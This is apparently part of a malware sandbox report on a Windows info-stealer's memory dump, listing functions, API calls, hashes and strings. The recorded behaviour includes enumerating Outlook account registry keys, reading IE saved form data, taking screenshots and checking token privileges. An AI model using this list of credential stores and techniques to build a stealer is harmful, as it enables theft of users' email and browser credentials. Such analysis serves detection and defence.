Part of subcall function 00431D1A: lstrcpyW.KERNEL32 ref: 00431DB1
Part of subcall function 00431D1A: lstrcatW.KERNEL32(00000000,0047C044), ref: 00431DBD
Part of subcall function 00431D1A: lstrcatW.KERNEL32(00000000,?), ref: 00431DCB
Part of subcall function 00431D1A: lstrcatW.KERNEL32(00000000,?), ref: 00431DD7
Part of subcall function 00431D1A: RegEnumKeyExW.ADVAPI32(00432194,?,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,0043207E,Identities,00000001), ref: 00431E11
Part of subcall function 00431D1A: RegCloseKey.ADVAPI32(00432194,?,?,?,0043207E,Identities,00000001,?,?,?,00432194), ref: 00431E26

Part of subcall function 00432621: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,00000000,00000100,00000100,00000000,00000000,?), ref: 00432669
Part of subcall function 00432621: RegQueryValueExW.KERNEL32(00000100,?,00000000,00000000,00000000,?), ref: 00432688
Part of subcall function 00432621: RegQueryValueExW.KERNEL32(00000100,?,00000000,00000000,00000000,?), ref: 004326C3
Part of subcall function 00432621: RegCloseKey.ADVAPI32(00000100), ref: 004326E4

lstrlenW.KERNEL32(00000000,?,?,?,00432194), ref: 004320A2
lstrcpyW.KERNEL32 ref: 004320BA
lstrcpyW.KERNEL32 ref: 004320C6

Part of subcall function 00431C4D: lstrlenW.KERNEL32(00432194,?,?,0043206A,00000001,?,?,?,00432194), ref: 00431C98
Part of subcall function 00431C4D: lstrcpyW.KERNEL32 ref: 00431CB5
Part of subcall function 00431C4D: lstrcatW.KERNEL32(00000000,0047C044), ref: 00431CC1
Part of subcall function 00431C4D: lstrcatW.KERNEL32(00000000,?), ref: 00431CCF

Part of subcall function 00443711: _free.LIBCMT ref: 00443724

Strings

Outlook, xrefs: 00432083
Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 004320E7
Software\Microsoft\Internet Account Manager, xrefs: 00432088
Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook, xrefs: 00432120
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook, xrefs: 0043213C
Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook, xrefs: 00432112
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook, xrefs: 0043214A
\Software\Microsoft\Internet Account Manager\Accounts, xrefs: 0043206A
Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook, xrefs: 0043212E
Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook, xrefs: 0043216C
Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook, xrefs: 00432158
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings, xrefs: 004320F9
\Accounts, xrefs: 004320C0
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook, xrefs: 00432104
Software\Microsoft\Internet Account Manager\Accounts, xrefs: 0043205E
Identities, xrefs: 00432074

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$lstrcpylstrlen$CloseEnumOpen$LibraryQueryValue$AddressFreeLoadProc_free
String ID: Identities$Outlook$Software\Microsoft\Internet Account Manager$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook$\Accounts$\Software\Microsoft\Internet Account Manager\Accounts
API String ID: 527226083-92925148
Opcode ID: 771594f804bf736a2ae6afbf36f1a36e78fd321c5b4c6be81020fbd5e67bdc35
Instruction ID: 5b7ec9226c481873c3046918c9c38008c531b9e218fab6762542c79c709fab1d
Opcode Fuzzy Hash: 771594f804bf736a2ae6afbf36f1a36e78fd321c5b4c6be81020fbd5e67bdc35
Instruction Fuzzy Hash: 5E314F71544248BEE704EBE1DDD3DEE7368EB15748F30606EF045221A2AF782F04962D

Uniqueness

Uniqueness Score: -1.00%

Function 004100D8, Relevance: 19.7, APIs: 5, Strings: 6, Instructions: 477librarystringCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004100DD

Part of subcall function 00432961: GetEnvironmentVariableA.KERNEL32(?,?,00000104,004879A4), ref: 004329AD

Part of subcall function 004324C8: __EH_prolog.LIBCMT ref: 004324CD
Part of subcall function 004324C8: _strcat.LIBCMT ref: 00432525

LoadLibraryA.KERNEL32(00000000), ref: 00410117
SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 0041014F
lstrcatW.KERNEL32(?,?), ref: 00410192

Part of subcall function 0040C332: __EH_prolog.LIBCMT ref: 0040C337
Part of subcall function 0040C332: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 0040C44A
Part of subcall function 0040C332: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 0040C451

Part of subcall function 004124F9: _Deallocate.LIBCONCRT ref: 0041250E

Part of subcall function 0040C72C: __EH_prolog.LIBCMT ref: 0040C731

FreeLibrary.KERNEL32(00000000), ref: 0041075E

Strings

*1,', xrefs: 004106A4
x|, xrefs: 004106F5
za|w, xrefs: 0041053C
$, xrefs: 00410543
Opera, xrefs: 0041019C
"9$/, xrefs: 004106EE

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$FreeHeapLibrary$DeallocateEnvironmentFolderLoadPathProcessSpecialVariable_strcatlstrcat
String ID: $$"9$/$*1,'$Opera$x|$za|w
API String ID: 1063041688-4207189186
Opcode ID: f18bdf715644a944e5cfc3ef99e488b69ae982e4f4205a41b5bc652996a6de88
Instruction ID: 257d92d4d88cd284c3d9a670f76b1fac6576ab193aca6e40423e47e00ae6c9ac
Opcode Fuzzy Hash: f18bdf715644a944e5cfc3ef99e488b69ae982e4f4205a41b5bc652996a6de88
Instruction Fuzzy Hash: 8112B230D00209DFDF14EBA5C9857EEBBB4AF14309F10416EE415BB282DB785A99CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00461E6E, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMON

Download Yara Rule

APIs

Part of subcall function 00461B27: CreateFileW.KERNEL32(00000000,00000000,?,00461F17,?,?,00000000,?,00461F17,00000000,0000000C), ref: 00461B44

GetLastError.KERNEL32 ref: 00461F82
__dosmaperr.LIBCMT ref: 00461F89
GetFileType.KERNEL32(00000000), ref: 00461F95
GetLastError.KERNEL32 ref: 00461F9F
__dosmaperr.LIBCMT ref: 00461FA8
CloseHandle.KERNEL32(00000000), ref: 00461FC8
CloseHandle.KERNEL32(004585B9), ref: 00462115
GetLastError.KERNEL32 ref: 00462147
__dosmaperr.LIBCMT ref: 0046214E

Strings

H, xrefs: 004620D3

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: f128b3ff2ae0fdf3256869f8c9438eac0135fc6a98c3f5f82560f50383d98ffe
Instruction ID: 8ba0e89d651102f5c6b37170ba8adfbe119c511eed252c391057979324163291
Opcode Fuzzy Hash: f128b3ff2ae0fdf3256869f8c9438eac0135fc6a98c3f5f82560f50383d98ffe
Instruction Fuzzy Hash: B1A16C31A041545FCF19DF68DC527AE3BA0EB06324F18015EFC11AB3A2E7799D16C75A

Uniqueness

Uniqueness Score: -1.00%

Function 0041DA19, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 192filetimeCOMMON

Download Yara Rule

APIs

_strcat.LIBCMT ref: 0041DAE0
wsprintfA.USER32 ref: 0041DB3A
wsprintfA.USER32 ref: 0041DB5B
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000010,00000000), ref: 0041DB8A
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0041DBFC
SetFileTime.KERNEL32(?,?,?,?), ref: 0041DC36
CloseHandle.KERNEL32(?), ref: 0041DC46

Strings

:, xrefs: 0041DB14
%s%s, xrefs: 0041DB55
%s%s%s, xrefs: 0041DB34

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$wsprintf$CloseCreateHandleTimeWrite_strcat
String ID: %s%s$%s%s%s$:
API String ID: 840165387-3034790606
Opcode ID: 08bf8ebd0b48a9f2b0a2be60c1b5da7b9076a2f2ac540e1dca30d822c434589e
Instruction ID: 82c438a7b2c229f772657dd577c898e7c957fae1a4ab7e7a04c4d96a0d6c2f03
Opcode Fuzzy Hash: 08bf8ebd0b48a9f2b0a2be60c1b5da7b9076a2f2ac540e1dca30d822c434589e
Instruction Fuzzy Hash: 4A617DB1D082089BCF20DF64C8C4BEA77A9AF45344F10446FE59697280E778AEC6CF49

Uniqueness

Uniqueness Score: -1.00%

Function 00428C4A, Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 174COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00428C4F

Strings

f`b, xrefs: 00428CEF
Mjql, xrefs: 00428E1A
~xz, xrefs: 00428E7F
Lkpm, xrefs: 00428E78
3, xrefs: 00428DB2
)0,B, xrefs: 00428E08
9$71, xrefs: 00428DA0
0)5[, xrefs: 00428CD6
Tshu, xrefs: 00428CE8

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: )0,B$0)5[$3$9$71$Lkpm$Mjql$Tshu$f`b$~xz
API String ID: 3519838083-903520802
Opcode ID: 46959cf6d1b6825011b84d02973631cc4376094cd4515433ecfb2d838a4d5c03
Instruction ID: 6d4c44c2f07a6dd2a4cae162152f9c1429e70a0b7055b5aeffffe012772f4c21
Opcode Fuzzy Hash: 46959cf6d1b6825011b84d02973631cc4376094cd4515433ecfb2d838a4d5c03
Instruction Fuzzy Hash: 5B819A74C013988ADB05DFE9EA911ECFBB0BF6A304F50525ED84477252EB741789CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00435B10, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000008,?,?,?), ref: 00435B22
OpenProcessToken.ADVAPI32(00000000), ref: 00435B29
GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00435B43
GetLastError.KERNEL32 ref: 00435B4D
GlobalAlloc.KERNEL32(00000040,00000000), ref: 00435B5D
GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 00435B71
ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00435B85
GlobalFree.KERNEL32 ref: 00435BA5

Strings

S-1-5-18, xrefs: 00435B92

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Token$GlobalInformationProcess$AllocConvertCurrentErrorFreeLastOpenString
String ID: S-1-5-18
API String ID: 857934279-4289277601
Opcode ID: 34043741933d8af6bdef4060ec151b36256c76127579d4d10d1ee5f619ab257e
Instruction ID: 82c209af946c0d4d00bb684e94ec6ad8edde2f2533cbc7265066c3e37ffb1230
Opcode Fuzzy Hash: 34043741933d8af6bdef4060ec151b36256c76127579d4d10d1ee5f619ab257e
Instruction Fuzzy Hash: 7C112B75A00608BBDB119FA5DC09FEFBF78EF48761F100065F901E1150EB749A14EB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00431D1A, Relevance: 15.1, APIs: 10, Instructions: 102stringregistryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,00432194,00000000,00020019,00432194,?,?,?,0043207E,Identities,00000001,?,?,?,00432194), ref: 00431D41
RegEnumKeyExW.ADVAPI32(00432194,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0043207E,Identities,00000001), ref: 00431D6C
lstrlenW.KERNEL32(00432194,00000000,?,?,?,0043207E,Identities,00000001,?,?,?,00432194), ref: 00431D83
lstrlenW.KERNEL32(?,00000000,?,?,?,0043207E,Identities,00000001,?,?,?,00432194), ref: 00431D90
lstrcpyW.KERNEL32 ref: 00431DB1
lstrcatW.KERNEL32(00000000,0047C044), ref: 00431DBD
lstrcatW.KERNEL32(00000000,?), ref: 00431DCB
lstrcatW.KERNEL32(00000000,?), ref: 00431DD7
RegEnumKeyExW.ADVAPI32(00432194,?,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,0043207E,Identities,00000001), ref: 00431E11
RegCloseKey.ADVAPI32(00432194,?,?,?,0043207E,Identities,00000001,?,?,?,00432194), ref: 00431E26

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$Enumlstrlen$CloseOpenlstrcpy
String ID:
API String ID: 3646165539-0
Opcode ID: 376d9da3da64458ad8b24d27dde60b0c70de4f19c94405d1dd03b493b924d8b9
Instruction ID: a83017d4a5559e4946a6f95d64495ad0271362ddaa869c2897b5eb026b52cc30
Opcode Fuzzy Hash: 376d9da3da64458ad8b24d27dde60b0c70de4f19c94405d1dd03b493b924d8b9
Instruction Fuzzy Hash: 24314171500149BFEB109F91DC48EFF7BBCEF86744F10406AF905E2210EB78AA519E65

Uniqueness

Uniqueness Score: -1.00%

Function 00428806, Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 280COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042880B

Part of subcall function 0040B434: __EH_prolog.LIBCMT ref: 0040B439

Part of subcall function 004124F9: _Deallocate.LIBCONCRT ref: 0041250E

Part of subcall function 00412716: _Deallocate.LIBCONCRT ref: 00412725

Strings

N(!6#/'"`:+#>, xrefs: 004288F2
"\, xrefs: 00428A0B
f, xrefs: 00428941
`z |, xrefs: 00428B1F
cy, xrefs: 0042899F
6,7-, xrefs: 00428996
km>, xrefs: 00428B26

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DeallocateH_prolog
String ID: "\$6,7-$N(!6#/'"`:+#>$`z |$cy$f$km>
API String ID: 3708980276-371030723
Opcode ID: 0da662300958e7bf30ef86c2eec853a53a05aef68264beef1fd824fc4f681635
Instruction ID: 8aa0ab18c72c4b46a06765d053f59118391fffc757606d887a6b5736970111f9
Opcode Fuzzy Hash: 0da662300958e7bf30ef86c2eec853a53a05aef68264beef1fd824fc4f681635
Instruction Fuzzy Hash: 50C1F230E05298CADF14EFA5D9916EDBBB1BF14304F9041AED04A77282DF781B89CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0045752D, Relevance: 13.8, APIs: 9, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6106149df97e4c8719485f0ddb9c6e42cef5246b048f485f5d6d27eb1b10b4ee
Instruction ID: 45b98ac14b1bff700c15402b61e62f730a1a00dc90d4157d23add892d4cf9d1d
Opcode Fuzzy Hash: 6106149df97e4c8719485f0ddb9c6e42cef5246b048f485f5d6d27eb1b10b4ee
Instruction Fuzzy Hash: 81C12670A08209AFDF01DF99E885BAE7BB0BF49315F10406AEC0597353D7389D49CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00431C4D, Relevance: 10.6, APIs: 7, Instructions: 75stringregistryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,00432194,00000000,00020019,00432194,?,?,0043206A,00000001,?,?,?,00432194), ref: 00431C72
lstrlenW.KERNEL32(00432194,?,?,0043206A,00000001,?,?,?,00432194), ref: 00431C98
lstrcpyW.KERNEL32 ref: 00431CB5
lstrcatW.KERNEL32(00000000,0047C044), ref: 00431CC1
lstrcatW.KERNEL32(00000000,?), ref: 00431CCF
RegEnumKeyExW.ADVAPI32(00432194,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,0043206A,00000001), ref: 00431D03
RegCloseKey.ADVAPI32(00432194,?,?,0043206A,00000001,?,?,?,00432194), ref: 00431D10

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$CloseEnumOpenlstrcpylstrlen
String ID:
API String ID: 2943937744-0
Opcode ID: 39641a0db53a1e9c16bfff0eab97f00c59ac09cf8fc1a018a1f6bef65641799d
Instruction ID: 9ebd16aa9a3c8b13083bffed28b6bd498b9930caca85d91248346001ffe53e82
Opcode Fuzzy Hash: 39641a0db53a1e9c16bfff0eab97f00c59ac09cf8fc1a018a1f6bef65641799d
Instruction Fuzzy Hash: 61215BB6401128BFEB119F91DD48DEF7B7CEF0A355F104066F905E2111EA745F508AAA

Uniqueness

Uniqueness Score: -1.00%

Function 00412DD5, Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00412DDA
std::_Lockit::_Lockit.LIBCPMT ref: 00412DE8
int.LIBCPMT ref: 00412DFF

Part of subcall function 00409FF7: std::_Lockit::_Lockit.LIBCPMT ref: 0040A008
Part of subcall function 00409FF7: std::_Lockit::~_Lockit.LIBCPMT ref: 0040A022

std::_Facet_Register.LIBCPMT ref: 00412E39
std::_Lockit::~_Lockit.LIBCPMT ref: 00412E4F
Concurrency::cancel_current_task.LIBCPMT ref: 00412E64

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prologRegister
String ID:
API String ID: 2251497708-0
Opcode ID: 262dd812ade3579cdad6fb07a097251ece19cb149952bb5787894cc2552cad4b
Instruction ID: 76bd858ecd430b1b8954a9912c36f8b8f9fa0303cb3e81c88823f5bff7b212eb
Opcode Fuzzy Hash: 262dd812ade3579cdad6fb07a097251ece19cb149952bb5787894cc2552cad4b
Instruction Fuzzy Hash: 8B1121729002199FCB14EB65C805AFE7774EF44724F10452FF820B7281DB789D04CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004357FD, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119registryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00435802
RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119,?,75D724D0,00000000,00000048), ref: 00435883
RegQueryValueExA.KERNEL32(?,?,00000000,?,?,00000040), ref: 004358D2
RegCloseKey.ADVAPI32(?), ref: 004358F3

Strings

@, xrefs: 0043583C

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseH_prologOpenQueryValue
String ID: @
API String ID: 1233982722-2766056989
Opcode ID: 6e59f6e85d2a5de881f57e12b611267da80cfcd65821b3b6f60f59b1dced278b
Instruction ID: 9925fd18740935e6e3290e94c7a8cc25bd088acaa736da9771c8c821ce41cee5
Opcode Fuzzy Hash: 6e59f6e85d2a5de881f57e12b611267da80cfcd65821b3b6f60f59b1dced278b
Instruction Fuzzy Hash: 32418B71D04259DFDB11DFA8D980AEEBBB8FF09304F10516EE449B7202EB744A89CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0042E08A, Relevance: 8.0, APIs: 1, Strings: 4, Instructions: 476stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004328A2: GetCurrentProcess.KERNEL32(00020008,?), ref: 004328BA
Part of subcall function 004328A2: OpenProcessToken.ADVAPI32(00000000), ref: 004328C1
Part of subcall function 004328A2: GetUserProfileDirectoryA.USERENV(?,?,00000200), ref: 004328D3
Part of subcall function 004328A2: CloseHandle.KERNEL32(?,?,00000200), ref: 004328E0

lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E7B0

Part of subcall function 00432961: GetEnvironmentVariableA.KERNEL32(?,?,00000104,004879A4), ref: 004329AD

Part of subcall function 004324C8: __EH_prolog.LIBCMT ref: 004324CD
Part of subcall function 004324C8: _strcat.LIBCMT ref: 00432525

Part of subcall function 004295B1: __EH_prolog.LIBCMT ref: 004295B6
Part of subcall function 004295B1: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 004295E4
Part of subcall function 004295B1: GetDesktopWindow.USER32 ref: 004295EA
Part of subcall function 004295B1: GetWindowRect.USER32 ref: 004295F7
Part of subcall function 004295B1: GetWindowDC.USER32(00000000), ref: 004295FE
Part of subcall function 004295B1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042961E
Part of subcall function 004295B1: CreateCompatibleDC.GDI32(00000000), ref: 00429627
Part of subcall function 004295B1: CreateDIBSection.GDI32(?,00000028,00000001,?,00000000,00000000), ref: 00429672
Part of subcall function 004295B1: DeleteDC.GDI32(00000000), ref: 00429686
Part of subcall function 004295B1: DeleteDC.GDI32(?), ref: 0042968B
Part of subcall function 004295B1: GdiplusShutdown.GDIPLUS(?), ref: 004297B3

Part of subcall function 0040BF84: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,?,?,?,?,?,00000000,00000000,?), ref: 0040BF97
Part of subcall function 0040BF84: DeleteFileTransactedA.KERNEL32 ref: 0040BFAE
Part of subcall function 0040BF84: CommitTransaction.KTMW32(00000000,?,00000000,?,?,?,?,00000000,00000000,?,?,?,004184D2,00000012,00000000), ref: 0040BFB9

Strings

1z, xrefs: 0042E66F, 0042E6AC, 0042E750
w, xrefs: 0042E618, 0042E75F, 0042E7F2, 0042E7FD, 0042E80C, 0042E837
], xrefs: 0042E84D
N, xrefs: 0042E39C

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateDeleteWindow$GdiplusH_prologProcessTransaction$CapsCloseCommitCompatibleCurrentDesktopDeviceDirectoryEnvironmentFileHandleOpenProfileRectSectionShutdownStartupTokenTransactedUserVariable_strcatlstrlen
String ID: N$]$1z$w
API String ID: 770976548-2783588105
Opcode ID: 3221e19dcf3a97c6c42e86da3e8c1dabbd41ddb1ef3d0dbb980ed90b14c37402
Instruction ID: 19315ea4c70089ab3cb2e0ece2920bfc0f47f93d6f54540893c8339b7a419653
Opcode Fuzzy Hash: 3221e19dcf3a97c6c42e86da3e8c1dabbd41ddb1ef3d0dbb980ed90b14c37402
Instruction Fuzzy Hash: 03125A349092A899CF24F765CD6ABDDB7715F26304F4000EEA559372C3DA782F88CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004535EE, Relevance: 7.7, APIs: 5, Instructions: 186COMMON

Download Yara Rule

APIs

Part of subcall function 00456E6E: RtlAllocateHeap.NTDLL(00000000,0043C5D3,00000000,?,0043E9FE,00000002,00000000,?,?,?,004098D6,0043C5D3,00000004,00000000,00000000,00000000), ref: 00456EA0

_free.LIBCMT ref: 004536FD
_free.LIBCMT ref: 00453714
_free.LIBCMT ref: 00453731
_free.LIBCMT ref: 0045374C
_free.LIBCMT ref: 00453763

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 2665c56d2ba88d5df820cf085d5f0282fe4977223e677fa82cda2bf9dd53e625
Instruction ID: 4f22b95dd1c3f83e749f8f58e81b384b49323d3029e98a62a5805a1a15472a46
Opcode Fuzzy Hash: 2665c56d2ba88d5df820cf085d5f0282fe4977223e677fa82cda2bf9dd53e625
Instruction Fuzzy Hash: 0F51F3B2A00704AFDB21DF29D881B6A77F4EF48756B10456EEC09D7352E738EA05CB48

Uniqueness

Uniqueness Score: -1.00%

Function 0041D956, Relevance: 7.6, APIs: 5, Instructions: 73COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,00000000,?), ref: 0041D96A
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0041D978
_strcat.LIBCMT ref: 0041D9DE
GetFileAttributesA.KERNEL32(00000000,00000000,?), ref: 0041D9FB
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0041DA0F

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AttributesCreateDirectoryFile$_strcat
String ID:
API String ID: 2481838186-0
Opcode ID: 353804ebafd7933eecadaf6683e489c8a8542dcb6cf9ec08d935875ee0f7742c
Instruction ID: a53855d7b92bfaa2c82c08ff8f1df1a6401d59dbac7766e306e01b6df9c24990
Opcode Fuzzy Hash: 353804ebafd7933eecadaf6683e489c8a8542dcb6cf9ec08d935875ee0f7742c
Instruction Fuzzy Hash: 8F1159F2D0031817CF2046786C88BDB776C5F46714F1401A7E594E3282EAB85DC58A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00455002, Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(0043C5D3,0043C5D3,00000002,00449659,00456EB1,00000000,?,0043E9FE,00000002,00000000,?,?,?,004098D6,0043C5D3,00000004), ref: 00455007
_free.LIBCMT ref: 00455064
_free.LIBCMT ref: 0045509A
SetLastError.KERNEL32(00000000,00000008,000000FF,?,0043E9FE,00000002,00000000,?,?,?,004098D6,0043C5D3,00000004,00000000,00000000,00000000), ref: 004550A5

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 6eeb2fae2471fe8518067fea6e6ffe04860ee1c99c4c6e5ed8468ae557d54de7
Instruction ID: 40501452bc6fda023ae9931e97358906c4fe1688143a3b00800802da91341993
Opcode Fuzzy Hash: 6eeb2fae2471fe8518067fea6e6ffe04860ee1c99c4c6e5ed8468ae557d54de7
Instruction Fuzzy Hash: 3D11E731200A006AC75126769CD5D3F29599BC4F7BB26013AFD24972D3DD6E8C0D436D

Uniqueness

Uniqueness Score: -1.00%

Function 0040BFD3, Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,004195F5,00000000), ref: 0040BFE7
CreateDirectoryTransactedA.KERNEL32 ref: 0040C000
CommitTransaction.KTMW32(00000000,?,004195F5,00000000), ref: 0040C00B
RollbackTransaction.KTMW32(00000000,?,004195F5,00000000), ref: 0040C013

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Transaction$Create$CommitDirectoryRollbackTransacted
String ID:
API String ID: 629542334-0
Opcode ID: 158c26d427eae19f32f05e9de73e276b4b4dba04ee7218db9c4d8c9f345e4641
Instruction ID: f72843302a7dbc6b02d0c02dfbc24cdbd5d761fb6b3a7afdfda82204c8c0a8cf
Opcode Fuzzy Hash: 158c26d427eae19f32f05e9de73e276b4b4dba04ee7218db9c4d8c9f345e4641
Instruction Fuzzy Hash: E8F06D71100115FFE7101B999CC8C6B7A2CDB457B47200236F922A22D0E6B49C918ABB

Uniqueness

Uniqueness Score: -1.00%

Function 004297D2, Relevance: 6.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000), ref: 004297E5
RemoveDirectoryTransactedA.KERNEL32 ref: 004297FC
CommitTransaction.KTMW32(00000000,?,00000000), ref: 00429807
RollbackTransaction.KTMW32(00000000,?,00000000), ref: 0042980F

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Transaction$CommitCreateDirectoryRemoveRollbackTransacted
String ID:
API String ID: 1201024725-0
Opcode ID: 96aec554fd131828732fcca28137729baf3983f981fc7cce07a08cfd1ecaa28c
Instruction ID: ff6721817ab619ca63bf791cd450e5509392692ea5ee8fdaf9362861ff9251a9
Opcode Fuzzy Hash: 96aec554fd131828732fcca28137729baf3983f981fc7cce07a08cfd1ecaa28c
Instruction Fuzzy Hash: 84F08971210520BFDB145B69AC0CD67376CDB47770B540625FD22E32D0F6A45D418A7B

Uniqueness

Uniqueness Score: -1.00%

Function 0040BF84, Relevance: 6.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,?,?,?,?,?,00000000,00000000,?), ref: 0040BF97
